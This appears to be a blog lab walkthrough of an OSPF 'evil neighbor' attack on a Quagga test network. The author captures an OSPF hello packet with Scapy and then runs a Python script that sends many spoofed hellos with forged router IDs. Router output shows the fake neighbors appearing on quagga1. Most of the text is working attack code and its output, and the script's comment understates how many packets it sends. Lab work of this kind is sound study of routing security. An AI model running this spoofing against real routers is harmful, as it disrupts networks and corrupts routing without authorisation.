I just referred to http://blog.egofuzzer.net/2011/04/ospfs-evil-neighbor.html.
many , many thanks !
| 192.168.0.0/24 ,
area 0.0.0.0 , no authentication
quagga1 0.254 ---------vSW -------- 0.253 quagga2| 0.30 scapy machine ( sends OSPF hello ) |
I’ve already configured OSPF relationship between quagga1 and quagga2.
On the scapy box ( ubuntu 12.04 ) , get an OSPF hello packet with scapy to make a crafted OSPF hello packet.
sniff OSPF hello packets.
| # scapy INFO: No IPv6 support in kernel WARNING: No route found for IPv6 destination :: (no default route?) Welcome to Scapy (2.2.0) >>> load_contrib('ospf') >>> sniff(filter="ip dst 224.0.0.5",count=1) <Sniffed: TCP:0 UDP:0 ICMP:0 Other:1> >>> _[0].show() ###[ Ethernet ]### dst= 01:00:5e:00:00:05 src= 52:54:00:d4:ab:3e type= 0x800 ###[ IP ]### version= 4L ihl= 5L tos= 0xc0 len= 68 id= 56607 flags= frag= 0L ttl= 1 proto= ospf chksum= 0x39d6 src= 192.168.0.254 <- quagga1 dst= 224.0.0.5 \options\ ###[ OSPF Header ]### version= 2 type= Hello len= 48 src= 192.168.1.254 area= 0.0.0.0 chksum= 0xf300 authtype= Null authdata= 0x0 ###[ OSPF Hello ]### mask= 255.255.255.0 hellointerval= 10 options= E prio= 1 deadinterval= 40 router= 192.168.0.253 backup= 192.168.0.254 neighbors= ['192.168.2.254'] >>> |
save above hello packet as a pcap file.
| >>> wrpcap("ospf_hello.pcap",_[0]) |
| # tshark -r ospf_hello.pcap -p ospf Running as user "root" and group "root". This could be dangerous. 1 0.000000 192.168.0.254 -> 224.0.0.5 OSPF 82 Hello Packet |
this script will send 10 OSPF hello packets
| # cat send_ospf_hello.py #!/usr/bin/env python from scapy.all import * load_contrib('ospf') pkts=rdpcap('ospf_hello.pcap') h=pkts[0] for i in range(0,200): for j in range(1,100): host="192.168.%s.%s" % (i,j) h[IP].src="192.168.0.30" h[IP].chksum=None h[OSPF_Hdr].src=host h[OSPF_Hdr].chksum=None h[OSPF_Hello].router=host h[OSPF_Hello].backup="192.168.0.254" h[OSPF_Hello].neighbor="192.168.0.254" sendp(h, verbose=1) |
send OSPF packets
| # ./send_ospf_hello.py WARNING: No route found for IPv6 destination :: (no default route?) . Sent 1 packets. <snip> |
before sending crafted OSPF hello packets.
| quagga1# show ip ospf neighbor Neighbor ID Pri State Dead Time Address Interface RXmtL RqstL DBsmL 192.168.2.254 1 Full/DR 35.435s 192.168.0.253 eth0:192.168.0.254 1 0 0 quagga1# |
while sending crafted hello packets.
| quagga1# show ip ospf neighbor Neighbor ID Pri State Dead Time Address Interface RXmtL RqstL DBsmL 192.168.68.78 1 Init/DROther 39.997s 192.168.0.30 eth0:192.168.0.254 0 0 0 192.168.2.254 1 Full/DR 39.250s 192.168.0.253 eth0:192.168.0.254 0 0 0 quagga1# show ip ospf neighbor Neighbor ID Pri State Dead Time Address Interface RXmtL RqstL DBsmL 192.168.72.10 1 Init/DROther 39.998s 192.168.0.30 eth0:192.168.0.254 0 0 0 192.168.2.254 1 Full/DR 38.442s 192.168.0.253 eth0:192.168.0.254 0 0 0 quagga1# |
| # tshark -r crafted_ospf.pcap -R '(ip.addr==192.168.0.30)' | head -5 2 1.779586 192.168.0.30 -> 224.0.0.5 OSPF Hello Packet 3 1.781786 192.168.0.30 -> 224.0.0.5 OSPF Hello Packet 4 1.783419 192.168.0.30 -> 224.0.0.5 OSPF Hello Packet 5 1.785150 192.168.0.30 -> 224.0.0.5 OSPF Hello Packet 6 1.787003 192.168.0.30 -> 224.0.0.5 OSPF Hello Packet |